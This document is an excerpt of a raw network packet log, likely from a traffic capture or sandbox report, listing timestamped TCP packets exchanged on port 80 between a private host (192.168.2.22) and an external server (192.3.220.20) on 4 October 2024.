                                                                                                                                            Oct 4, 2024 11:56:03.870513916 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.870523930 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.870528936 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.870529890 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.870549917 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.870562077 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.871098042 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.871140957 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.871213913 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.871229887 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.871251106 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.871265888 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.871321917 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.871336937 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.871407032 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.871463060 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.872077942 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.872137070 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.872272015 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.872287989 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.872314930 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.872323990 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.872339010 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.872354984 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.872374058 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.872384071 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.873018026 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.873033047 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.873048067 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.873065948 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.873075008 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.873147011 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.873162031 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.873202085 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.873209000 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.873869896 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.873914003 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.874134064 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.874178886 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.958875895 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.958954096 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.958970070 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.959012985 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.959028959 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.959062099 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.959079027 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.959096909 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.959110975 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.959127903 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.959144115 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.959160089 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.959167004 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.959197044 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.959206104 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.959244013 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.959563017 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.959595919 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.959623098 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.959630013 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.959650040 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.959672928 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.959709883 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.959743023 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.959769011 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.959781885 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.959795952 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.959815979 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.959826946 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.959860086 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.960390091 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.960444927 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.960449934 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.960479975 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.960495949 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.960522890 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.960546017 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.960611105 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.960798025 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.960846901 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.960900068 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.960938931 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.960952997 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.960975885 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.960983992 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.961021900 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.961277008 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.961312056 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.961335897 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.961348057 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.961354971 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.961391926 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.962277889 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.962311029 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.962333918 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.962342978 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.962357998 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.962376118 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.962385893 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.962409019 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.962416887 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.962440968 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.962454081 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.962475061 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.962482929 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.962516069 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.962821960 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.962878942 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.963062048 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.963103056 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.963116884 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.963151932 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.963151932 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.963182926 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.963195086 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.963216066 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.963244915 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.963251114 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.963253021 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.963293076 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.964020014 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.964051962 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.964077950 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.964082956 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.964102983 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.964114904 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.964121103 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.964148045 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:03.964160919 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:03.964185953 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.004404068 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.004426003 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.004441977 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.004461050 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.004472971 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.004492044 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.047755003 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.047801971 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.047816992 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.047837973 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.047851086 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.047871113 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.047894955 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.047904015 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.047905922 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.047944069 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.047956944 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.047988892 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.047998905 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.048021078 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.048033953 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.048053980 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.048069000 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.048085928 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.048099995 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.048119068 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.048130989 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.048150063 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.048155069 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.048183918 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.048192024 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.048226118 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.048502922 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.048536062 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.048558950 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.048568010 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.048577070 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.048603058 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.048615932 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.048636913 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.048657894 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.048679113 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.048779011 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.048830986 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.048902035 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.048952103 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.048954964 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.048999071 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.049021959 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.049053907 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.049065113 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.049087048 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.049096107 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.049120903 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.049128056 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.049161911 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.049310923 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.049343109 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.049364090 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.049376965 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.049384117 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.049418926 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.049632072 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.049680948 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.049714088 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.049738884 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.049740076 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.049823999 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.049848080 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.049880981 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.049909115 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.049915075 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.049946070 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.049947023 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.049973011 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.049998045 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.050117970 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.050149918 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.050183058 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.050184965 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.050184965 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.050216913 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.050250053 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.050374031 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.050578117 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.050627947 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.050635099 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.050662994 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.050685883 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.050703049 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.050766945 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.050798893 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.050821066 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.050832987 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.050843954 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.050868034 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.050874949 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.050910950 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.051075935 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.051107883 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.051131964 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.051139116 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.051146984 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.051172972 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.051181078 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.051215887 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.051507950 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.051541090 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.051562071 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.051573038 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.051578045 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.051615953 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.051765919 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.051799059 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.051820040 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.051831007 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.051837921 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.051883936 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.053329945 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.053379059 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.053432941 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.053488016 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.053877115 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.053891897 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.053906918 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.053926945 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.053945065 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.053945065 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.053957939 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.053972960 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.053987026 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.053992987 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.054003000 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.054011106 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.054023027 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.054039955 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.054235935 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.054250956 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.054265976 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.054274082 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.054280996 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.054286957 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.054303885 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.054315090 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.054325104 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.054371119 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.054439068 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.054454088 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.054476976 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.054488897 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.054646969 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.054661989 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.054676056 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.054692030 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.054713964 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.093051910 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.093121052 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.093156099 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.093159914 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.093180895 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.093189001 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.093198061 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.093224049 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.093233109 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.093257904 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.093265057 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.093301058 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.347079992 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.347131014 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.347184896 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.347234011 CEST8049169192.3.220.20192.168.2.22
